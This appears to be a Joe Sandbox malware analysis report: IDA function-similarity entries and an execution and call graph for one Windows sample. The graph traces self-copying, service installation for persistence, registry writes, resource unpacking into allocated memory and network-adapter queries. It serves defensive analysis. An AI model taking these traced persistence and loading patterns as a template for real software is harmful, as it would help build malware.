                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Value$EnumQuery
                                                                              • String ID: Inno Setup: No Icons
                                                                              • API String ID: 1576479698-2016326496
                                                                              • Opcode ID: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
                                                                              • Instruction ID: 57ddeb90a82b523466695c0d6df077a59cb4ba665f60dcca1a1637bef7e5778e
                                                                              • Opcode Fuzzy Hash: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
                                                                              • Instruction Fuzzy Hash: 19012B31B4533069F73085167D01F7B668C8B82B64F64003BF941EA3C0D6D99C04D36E
                                                                              APIs
                                                                                • Part of subcall function 0047BB30: FreeLibrary.KERNEL32(6FB90000,0047FFE2), ref: 0047BB46
                                                                                • Part of subcall function 0047B804: GetTickCount.KERNEL32 ref: 0047B84C
                                                                                • Part of subcall function 0045648C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004564AB
                                                                              • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00496E1F), ref: 0049651D
                                                                              • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00496E1F), ref: 00496523
                                                                              Strings
                                                                              • Detected restart. Removing temporary directory., xrefs: 004964D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                              • String ID: Detected restart. Removing temporary directory.
                                                                              • API String ID: 1717587489-3199836293
                                                                              • Opcode ID: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
                                                                              • Instruction ID: ef6d07dd072ead5de2427941989604cf9fc91a718c8df879baec15603ccd013a
                                                                              • Opcode Fuzzy Hash: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
                                                                              • Instruction Fuzzy Hash: BFE0ED722086007EDA0277BABC16A1B3F5CDB8677C793083BF90882543CA2D8804D6BD
                                                                              APIs
                                                                                • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                              • ReleaseMutex.KERNEL32(00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000), ref: 00496BFB
                                                                              • CloseHandle.KERNEL32(00000000,00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C), ref: 00496C04
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDeleteFileHandleMutexRelease
                                                                              • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                              • API String ID: 3841931355-3392794427
                                                                              • Opcode ID: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                              • Instruction ID: 9d4ffa1f72b1828a9bd2e7b92801d6c81e017e55b738e106198dcdadd1a8305d
                                                                              • Opcode Fuzzy Hash: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                              • Instruction Fuzzy Hash: B6F0A7316086549EDF05ABA5E82296E7BA8FB48314F63087BF404E65C0D53C5C10CA2C
                                                                              APIs
                                                                              • SetFocus.USER32(00000000,+qI,00000000,00421A84,00000000,00000000,00418608,00000000,00000001,?,?,00464ADA,00000001,00000000,00000000,0046A045), ref: 00421D5B
                                                                              • GetFocus.USER32 ref: 00421D69
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Focus
                                                                              • String ID: +qI
                                                                              • API String ID: 2734777837-4068327824
                                                                              • Opcode ID: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                              • Instruction ID: 7c51ddb3d8c31a7125e72aada4db547e67c97af2ef3b4f9e878502f62af25610
                                                                              • Opcode Fuzzy Hash: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                              • Instruction Fuzzy Hash: EAE04831710211A7DB1036796C857EB11855B64344F55947FF546DB263DE7CDC85068C
                                                                              APIs
                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456C11
                                                                              • FileTimeToSystemTime.KERNEL32(00000000,$pI,00000000,0049A628), ref: 00456C28
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Time$FileSystem
                                                                              • String ID: $pI
                                                                              • API String ID: 2086374402-3761944556
                                                                              • Opcode ID: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                              • Instruction ID: 229b1bfa25ea94c428731b1611971c6890b9b5f6c230ce37e6a86d23df0ccc86
                                                                              • Opcode Fuzzy Hash: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                              • Instruction Fuzzy Hash: DFD05B7340830C66CF01F1E5AC82CCFB79CD504324F100677A118A25C1FE39A654565C
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
                                                                              • GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CommandHandleLineModule
                                                                              • String ID: H6p
                                                                              • API String ID: 2123368496-1490150691
                                                                              • Opcode ID: 746e9a92de36605cdfd87c84c822714f18c0eb0a2b64ce99e66b90c69837d839
                                                                              • Instruction ID: 938fc5d7150061a66cd9a397de50459b98cc473a78e96f9e03329754a5f1b6bd
                                                                              • Opcode Fuzzy Hash: 746e9a92de36605cdfd87c84c822714f18c0eb0a2b64ce99e66b90c69837d839
                                                                              • Instruction Fuzzy Hash: 57C002A09012058AE750AFB6A84AB552A94A751349F8044BFB104BA2E2DA7D82156BDF
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastSleep
                                                                              • String ID:
                                                                              • API String ID: 1458359878-0
                                                                              • Opcode ID: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                              • Instruction ID: 9275ee504a9eb35dba3a5523cc5197587f06a42b27f59d217f7189e04cd8cbf1
                                                                              • Opcode Fuzzy Hash: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                              • Instruction Fuzzy Hash: 1FF024B6B04514678F20E99FD881B2F62CCDAD836E710012BFC04DF343C438EE8986A9

                                                                              Execution Graph

                                                                              Execution Coverage:21.7%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:13.5%
                                                                              Total number of Nodes:399
                                                                              Total number of Limit Nodes:7
                                                                              execution_graph 2499 404b30 2500 404b38 2499->2500 2501 404bca 2500->2501 2503 404a40 RtlUnwind 2500->2503 2504 404a58 2503->2504 2504->2500 2036 402f72 GetVersion 2061 4032aa HeapCreate 2036->2061 2038 402fd1 2039 402fd6 2038->2039 2040 402fde 2038->2040 2161 40308d 2039->2161 2073 404892 2040->2073 2044 402fe6 GetCommandLineA 2087 404760 2044->2087 2048 403000 2119 40445a 2048->2119 2050 403005 2051 40300a GetStartupInfoA 2050->2051 2132 404402 2051->2132 2053 40301c GetModuleHandleA 2136 4026f0 GetModuleHandleA GetModuleFileNameA 2053->2136 2056 403040 2167 4041a9 2056->2167 2062 403300 2061->2062 2063 4032ca 2061->2063 2062->2038 2174 403162 2063->2174 2066 4032e6 2068 403303 2066->2068 2188 403b58 2066->2188 2067 4032d9 2186 403307 HeapAlloc 2067->2186 2068->2038 2071 4032e3 2071->2068 2072 4032f4 HeapDestroy 2071->2072 2072->2062 2251 402ec0 2073->2251 2075 4048b1 GetStartupInfoA 2083 4049c2 2075->2083 2086 4048fd 2075->2086 2079 4049e9 GetStdHandle 2082 4049f7 GetFileType 2079->2082 2079->2083 2080 404a29 SetHandleCount 2080->2044 2081 402ec0 12 API calls 2081->2086 2082->2083 2083->2079 2083->2080 2084 40496e 2084->2083 2085 404990 GetFileType 2084->2085 2085->2084 2086->2081 2086->2083 2086->2084 2088 40477b GetEnvironmentStringsW 2087->2088 2089 4047ae 2087->2089 2090 404783 2088->2090 2091 40478f GetEnvironmentStrings 2088->2091 2089->2090 2093 40479f 2089->2093 2094 4047c7 WideCharToMultiByte 2090->2094 2095 4047bb GetEnvironmentStringsW 2090->2095 2092 402ff6 2091->2092 2091->2093 2110 404513 2092->2110 2093->2092 2096 404841 GetEnvironmentStrings 2093->2096 2097 40484d 2093->2097 2099 4047fb 2094->2099 2100 40482d FreeEnvironmentStringsW 2094->2100 2095->2092 2095->2094 2096->2092 2096->2097 2101 402ec0 12 API calls 2097->2101 2102 402ec0 12 API calls 2099->2102 2100->2092 2108 404868 2101->2108 2103 404801 2102->2103 2103->2100 2104 40480a WideCharToMultiByte 2103->2104 2106 404824 2104->2106 2107 40481b 2104->2107 2105 40487e FreeEnvironmentStringsA 2105->2092 2106->2100 2317 4030b1 2107->2317 2108->2105 2111 404525 2110->2111 2112 40452a GetModuleFileNameA 2110->2112 2347 40588b 2111->2347 2114 40454d 2112->2114 2115 402ec0 12 API calls 2114->2115 2116 40456e 2115->2116 2117 40457e 2116->2117 2118 403068 7 API calls 2116->2118 2117->2048 2118->2117 2120 404467 2119->2120 2122 40446c 2119->2122 2121 40588b 19 API calls 2120->2121 2121->2122 2123 402ec0 12 API calls 2122->2123 2124 404499 2123->2124 2125 403068 7 API calls 2124->2125 2130 4044ad 2124->2130 2125->2130 2126 4044f0 2127 4030b1 7 API calls 2126->2127 2128 4044fc 2127->2128 2128->2050 2129 402ec0 12 API calls 2129->2130 2130->2126 2130->2129 2131 403068 7 API calls 2130->2131 2131->2130 2133 40440b 2132->2133 2135 404410 2132->2135 2134 40588b 19 API calls 2133->2134 2134->2135 2135->2053 2371 402dd0 2136->2371 2141 402776 lstrcmpiW 2143 402788 2141->2143 2144 4027ed lstrcmpiW 2141->2144 2142 402948 StartServiceCtrlDispatcherA 2142->2056 2143->2142 2152 4027a7 2143->2152 2157 4027e8 2143->2157 2145 402805 2144->2145 2146 40289c lstrcmpiW 2144->2146 2377 402548 2145->2377 2146->2142 2147 4028ae RegCreateKeyExA 2146->2147 2149 4028d0 2147->2149 2150 40292f SetEvent 2147->2150 2156 4028e2 GetTickCount wsprintfA RegSetValueExA RegCloseKey 2149->2156 2396 402351 2150->2396 2159 4027bc CreateFileA CloseHandle ExitProcess 2152->2159 2154 402812 RegCreateKeyExA 2154->2142 2155 402838 2154->2155 2160 40284a GetTickCount wsprintfA RegSetValueExA RegCloseKey 2155->2160 2156->2150 2157->2142 2160->2142 2162 403096 2161->2162 2163 40309b 2161->2163 2164 404c10 7 API calls 2162->2164 2165 404c49 7 API calls 2163->2165 2164->2163 2166 4030a4 ExitProcess 2165->2166 2456 4041cb 2167->2456 2170 40427e 2171 40428a 2170->2171 2172 4043b3 UnhandledExceptionFilter 2171->2172 2173 40305a 2171->2173 2172->2173 2197 402da0 2174->2197 2177 4031a5 GetEnvironmentVariableA 2181 4031c4 2177->2181 2185 403282 2177->2185 2178 40318b 2178->2177 2180 40319d 2178->2180 2180->2066 2180->2067 2182 403209 GetModuleFileNameA 2181->2182 2183 403201 2181->2183 2182->2183 2183->2185 2199 404d9c 2183->2199 2185->2180 2202 403135 GetModuleHandleA 2185->2202 2187 403323 2186->2187 2187->2071 2189 403b65 2188->2189 2190 403b6c HeapAlloc 2188->2190 2191 403b89 VirtualAlloc 2189->2191 2190->2191 2196 403bc1 2190->2196 2192 403ba9 VirtualAlloc 2191->2192 2193 403c7e 2191->2193 2194 403c70 VirtualFree 2192->2194 2192->2196 2195 403c86 HeapFree 2193->2195 2193->2196 2194->2193 2195->2196 2196->2071 2198 402dac GetVersionExA 2197->2198 2198->2177 2198->2178 2204 404db3 2199->2204 2203 40314c 2202->2203 2203->2180 2206 404dcb 2204->2206 2208 404dfb 2206->2208 2211 405afa 2206->2211 2207 405afa 6 API calls 2207->2208 2208->2207 2210 404daf 2208->2210 2215 405a2e 2208->2215 2210->2185 2212 405b18 2211->2212 2214 405b0c 2211->2214 2221 405dbe 2212->2221 2214->2206 2216 405a59 2215->2216 2219 405a3c 2215->2219 2217 405a75 2216->2217 2218 405afa 6 API calls 2216->2218 2217->2219 2233 405b6f 2217->2233 2218->2217 2219->2208 2222 405def GetStringTypeW 2221->2222 2226 405e07 2221->2226 2224 405e0b GetStringTypeA 2222->2224 2222->2226 2223 405e32 GetStringTypeA 2227 405ef3 2223->2227 2224->2226 2224->2227 2226->2223 2228 405e56 2226->2228 2227->2214 2228->2227 2229 405e6c MultiByteToWideChar 2228->2229 2229->2227 2230 405e90 2229->2230 2230->2227 2231 405eca MultiByteToWideChar 2230->2231 2231->2227 2232 405ee3 GetStringTypeW 2231->2232 2232->2227 2234 405bbb 2233->2234 2235 405b9f LCMapStringW 2233->2235 2238 405c21 2234->2238 2239 405c04 LCMapStringA 2234->2239 2235->2234 2236 405bc3 LCMapStringA 2235->2236 2236->2234 2237 405cfd 2236->2237 2237->2219 2238->2237 2240 405c37 MultiByteToWideChar 2238->2240 2239->2237 2240->2237 2241 405c61 2240->2241 2241->2237 2242 405c97 MultiByteToWideChar 2241->2242 2242->2237 2243 405cb0 LCMapStringW 2242->2243 2243->2237 2244 405ccb 2243->2244 2245 405cd1 2244->2245 2247 405d11 2244->2247 2245->2237 2246 405cdf LCMapStringW 2245->2246 2246->2237 2247->2237 2248 405d49 LCMapStringW 2247->2248 2248->2237 2249 405d61 WideCharToMultiByte 2248->2249 2249->2237 2260 402ed2 2251->2260 2254 403068 2255 403071 2254->2255 2256 403076 2254->2256 2297 404c10 2255->2297 2303 404c49 2256->2303 2261 402ecf 2260->2261 2263 402ed9 2260->2263 2261->2075 2261->2254 2263->2261 2264 402efe 2263->2264 2265 402f0d 2264->2265 2268 402f22 2264->2268 2272 402f1b 2265->2272 2273 4036a3 2265->2273 2267 402f61 HeapAlloc 2269 402f70 2267->2269 2268->2267 2268->2272 2279 403e50 2268->2279 2269->2263 2270 402f20 2270->2263 2272->2267 2272->2269 2272->2270 2275 4036d5 2273->2275 2274 403783 2274->2272 2275->2274 2278 403774 2275->2278 2286 4039ac 2275->2286 2278->2274 2293 403a5d 2278->2293 2284 403e5e 2279->2284 2280 403f4a VirtualAlloc 2285 403f1b 2280->2285 2281 40401f 2282 403b58 5 API calls 2281->2282 2282->2285 2284->2280 2284->2281 2284->2285 2285->2272 2287 4039ef HeapAlloc 2286->2287 2288 4039bf HeapReAlloc 2286->2288 2290 403a15 VirtualAlloc 2287->2290 2292 403a3f 2287->2292 2289 4039de 2288->2289 2288->2292 2289->2287 2291 403a2f HeapFree 2290->2291 2290->2292 2291->2292 2292->2278 2294 403a6f VirtualAlloc 2293->2294 2296 403ab8 2294->2296 2296->2274 2298 404c1a 2297->2298 2299 404c47 2298->2299 2300 404c49 7 API calls 2298->2300 2299->2256 2301 404c31 2300->2301 2302 404c49 7 API calls 2301->2302 2302->2299 2305 404c5c 2303->2305 2304 404d73 2307 404d86 GetStdHandle WriteFile 2304->2307 2305->2304 2306 404c9c 2305->2306 2311 40307f 2305->2311 2308 404ca8 GetModuleFileNameA 2306->2308 2306->2311 2307->2311 2309 404cc0 2308->2309 2312 4058a7 2309->2312 2311->2075 2313 4058b4 LoadLibraryA 2312->2313 2315 4058f6 2312->2315 2314 4058c5 GetProcAddress 2313->2314 2313->2315 2314->2315 2316 4058dc GetProcAddress GetProcAddress 2314->2316 2315->2311 2316->2315 2318 4030bd 2317->2318 2326 4030d9 2317->2326 2321 4030c7 2318->2321 2322 4030dd 2318->2322 2319 403108 2320 403109 HeapFree 2319->2320 2320->2326 2321->2320 2323 4030d3 2321->2323 2322->2319 2325 4030f7 2322->2325 2328 40337a 2323->2328 2334 403e0b 2325->2334 2326->2106 2329 4033b8 2328->2329 2333 40366e 2328->2333 2330 4035b4 VirtualFree 2329->2330 2329->2333 2331 403618 2330->2331 2332 403627 VirtualFree HeapFree 2331->2332 2331->2333 2332->2333 2333->2326 2335 403e38 2334->2335 2336 403e4e 2334->2336 2335->2336 2338 403cf2 2335->2338 2336->2326 2341 403cff 2338->2341 2339 403daf 2339->2336 2340 403d20 VirtualFree 2340->2341 2341->2339 2341->2340 2343 403c9c VirtualFree 2341->2343 2344 403cb9 2343->2344 2345 403ce9 2344->2345 2346 403cc9 HeapFree 2344->2346 2345->2341 2346->2341 2348 405894 2347->2348 2349 40589b 2347->2349 2351 4054c7 2348->2351 2349->2112 2358 405660 2351->2358 2355 40550a GetCPInfo 2357 40551e 2355->2357 2356 405654 2356->2349 2357->2356 2363 405706 GetCPInfo 2357->2363 2359 405680 2358->2359 2360 405670 GetOEMCP 2358->2360 2361 4054d8 2359->2361 2362 405685 GetACP 2359->2362 2360->2359 2361->2355 2361->2356 2361->2357 2362->2361 2365 405729 2363->2365 2370 4057f1 2363->2370 2364 405dbe 6 API calls 2366 4057a5 2364->2366 2365->2364 2367 405b6f 9 API calls 2366->2367 2368 4057c9 2367->2368 2369 405b6f 9 API calls 2368->2369 2369->2370 2370->2356 2372 40273c GetCommandLineW CommandLineToArgvW GetLocalTime 2371->2372 2373 401fbe 2372->2373 2374 401fd3 2373->2374 2403 401a1d 2374->2403 2376 401fdc 2376->2141 2376->2142 2378 402569 2377->2378 2379 402576 GetModuleHandleA GetModuleFileNameA 2378->2379 2380 402ec0 12 API calls 2379->2380 2381 402595 2380->2381 2382 402ec0 12 API calls 2381->2382 2383 4025a6 2382->2383 2384 4025db GetModuleHandleA GetModuleFileNameW RegOpenKeyExA 2383->2384 2385 4026d6 2384->2385 2386 402616 RegQueryValueExA 2384->2386 2385->2142 2385->2154 2386->2385 2387 402640 RegCloseKey 2386->2387 2388 402654 2387->2388 2389 402660 CreateDirectoryA 2388->2389 2390 402676 2389->2390 2391 402688 CopyFileA 2390->2391 2391->2385 2392 40269e OpenSCManagerA 2391->2392 2392->2385 2393 4026af CreateServiceA 2392->2393 2394 4026dd CloseServiceHandle CloseServiceHandle 2393->2394 2395 4026cd CloseServiceHandle 2393->2395 2394->2385 2395->2385 2397 402362 WaitForSingleObject 2396->2397 2398 402368 2397->2398 2399 4023cc ExitProcess 2397->2399 2401 4023b1 Sleep 2398->2401 2441 4021c6 VirtualAlloc 2398->2441 2448 401ffb FindResourceA 2398->2448 2401->2397 2404 401a2c 2403->2404 2411 401a58 CreateFileA 2404->2411 2410 401a47 2410->2376 2412 401a86 2411->2412 2413 401a35 2411->2413 2414 401aa1 DeviceIoControl 2412->2414 2415 401b43 CloseHandle 2412->2415 2417 401b17 GetLastError 2412->2417 2431 402d06 2412->2431 2434 402cf8 2412->2434 2419 401b54 LoadLibraryA 2413->2419 2414->2412 2415->2413 2417->2412 2417->2415 2420 401b77 GetProcAddress 2419->2420 2421 401a3e 2419->2421 2422 401c21 FreeLibrary 2420->2422 2423 401b8e 2420->2423 2428 401c2f 2421->2428 2422->2421 2424 401b9e GetAdaptersInfo 2423->2424 2425 402d06 7 API calls 2423->2425 2426 401c1e 2423->2426 2427 402cf8 12 API calls 2423->2427 2424->2423 2425->2423 2426->2422 2427->2423 2437 401c5b GetWindowsDirectoryA 2428->2437 2430 401c3e 2430->2410 2432 4030b1 7 API calls 2431->2432 2433 402d0f 2432->2433 2433->2412 2435 402ed2 12 API calls 2434->2435 2436 402d03 2435->2436 2436->2412 2438 401cb7 2437->2438 2439 401c7e CreateFileA 2437->2439 2438->2430 2439->2438 2440 401ca2 GetFileTime CloseHandle 2439->2440 2440->2438 2445 4021f8 2441->2445 2442 40230a 2444 402331 Sleep 2442->2444 2443 402293 GetLastError LoadLibraryExA 2443->2445 2446 402347 2444->2446 2445->2442 2445->2443 2447 4022dc GetProcAddress 2445->2447 2446->2398 2447->2445 2449 402036 2448->2449 2450 40201d GetLastError SizeofResource 2448->2450 2449->2398 2450->2449 2451 40203d LoadResource LockResource GlobalAlloc 2450->2451 2452 402069 2451->2452 2453 402092 GetTickCount 2452->2453 2455 40209c GlobalAlloc 2453->2455 2455->2449 2457 4041d7 GetCurrentProcess TerminateProcess 2456->2457 2460 4041e8 2456->2460 2457->2460 2458 403049 2458->2170 2459 404252 ExitProcess 2460->2458 2460->2459 2466 405c83 2467 405c92 2466->2467 2468 405c97 MultiByteToWideChar 2467->2468 2472 405cfd 2467->2472 2469 405cb0 LCMapStringW 2468->2469 2468->2472 2470 405ccb 2469->2470 2469->2472 2471 405cd1 2470->2471 2473 405d11 2470->2473 2471->2472 2474 405cdf LCMapStringW 2471->2474 2473->2472 2475 405d49 LCMapStringW 2473->2475 2474->2472 2475->2472 2476 405d61 WideCharToMultiByte 2475->2476 2476->2472 2478 4023d3 2479 402425 2478->2479 2480 4023da 2478->2480 2480->2479 2481 4023e5 GetLastError SetServiceStatus SetEvent 2480->2481 2481->2479 2505 405d37 2506 405d45 2505->2506 2507 405d49 LCMapStringW 2506->2507 2510 405cfd 2506->2510 2508 405d61 WideCharToMultiByte 2507->2508 2507->2510 2508->2510 2492 402428 RegisterServiceCtrlHandlerA 2493 402541 2492->2493 2494 40244b 2492->2494 2495 402459 SetServiceStatus GetLastError CreateEventA 2494->2495 2496 4024d2 SetServiceStatus CreateThread WaitForSingleObject CloseHandle 2495->2496 2497 4024b3 GetLastError 2495->2497 2498 402538 SetServiceStatus 2496->2498 2497->2498 2498->2493 2511 404b38 2512 404bca 2511->2512 2514 404b56 2511->2514 2513 404a40 RtlUnwind 2513->2514 2514->2512 2514->2513 2461 4041cb 2462 4041d7 GetCurrentProcess TerminateProcess 2461->2462 2465 4041e8 2461->2465 2462->2465 2463 404262 2464 404252 ExitProcess 2465->2463 2465->2464 2515 405ebb 2516 405ec2 2515->2516 2517 405ef3 2516->2517 2518 405eca MultiByteToWideChar 2516->2518 2518->2517 2519 405ee3 GetStringTypeW 2518->2519 2519->2517 2482 40305d 2489 4041ba 2482->2489 2484 403068 2485 403076 2484->2485 2486 404c10 7 API calls 2484->2486 2487 404c49 7 API calls 2485->2487 2486->2485 2488 40307f 2487->2488 2490 4041cb 3 API calls 2489->2490 2491 4041c7 2490->2491 2491->2484

                                                                              Callgraph

                                                                              • Executed
                                                                              • Not Executed
                                                                              • Opacity -> Relevance
                                                                              • Disassembly available
                                                                              callgraph 0 Function_00404A40 1 Function_00402548 65 Function_00402EC0 1->65 72 Function_00402DD0 1->72 79 Function_00402DE0 1->79 105 Function_00402CA0 1->105 2 Function_00404C49 52 Function_00402D20 2->52 58 Function_00405930 2->58 2->72 2->79 109 Function_004058A7 2->109 3 Function_0040334F 4 Function_00405150 5 Function_00403E50 11 Function_00403B58 5->11 12 Function_00404058 5->12 5->105 6 Function_00401051 7 Function_00402351 67 Function_004021C6 7->67 86 Function_00401FF7 7->86 89 Function_00401FFB 7->89 8 Function_00401B54 38 Function_00402D06 8->38 8->52 70 Function_004018CC 8->70 87 Function_00402CF8 8->87 9 Function_00404A58 10 Function_00401A58 10->38 10->52 10->70 10->87 11->105 13 Function_00405359 14 Function_0040445A 24 Function_00403068 14->24 14->52 14->65 14->72 96 Function_0040588B 14->96 115 Function_004030B1 14->115 15 Function_00401C5B 16 Function_0040305D 16->2 45 Function_00404C10 16->45 119 Function_004041BA 16->119 17 Function_00403A5D 18 Function_00404A60 19 Function_00405660 20 Function_00404760 21 Function_00402960 20->21 20->65 20->115 22 Function_00403162 44 Function_00405110 22->44 62 Function_00403135 22->62 71 Function_00404FD0 22->71 98 Function_00405090 22->98 103 Function_00404D9C 22->103 106 Function_00402DA0 22->106 23 Function_00404264 24->2 24->45 25 Function_00405368 26 Function_00402B69 27 Function_00405B6F 101 Function_00405D93 27->101 27->106 28 Function_00402F72 28->14 28->20 31 Function_0040417C 28->31 32 Function_0040427E 28->32 36 Function_00404402 28->36 47 Function_00404513 28->47 83 Function_004026F0 28->83 97 Function_0040308D 28->97 100 Function_00404892 28->100 110 Function_004041A9 28->110 111 Function_004032AA 28->111 29 Function_00402B78 30 Function_0040337A 30->4 31->23 124 Function_004043BF 32->124 33 Function_00405C7F 34 Function_00401000 35 Function_0040A400 95 Function_00405485 36->95 36->96 37 Function_00405706 37->27 123 Function_00405DBE 37->123 38->115 39 Function_00403307 40 Function_0040A408 41 Function_00403E0B 84 Function_00403CF2 41->84 42 Function_00404B0D 43 Function_0040530E 45->2 46 Function_00405210 47->24 47->65 47->96 114 Function_004045AC 47->114 48 Function_00404B16 49 Function_0040311A 50 Function_00401A1D 50->8 50->10 55 Function_00401029 50->55 57 Function_00401C2F 50->57 92 Function_00401982 50->92 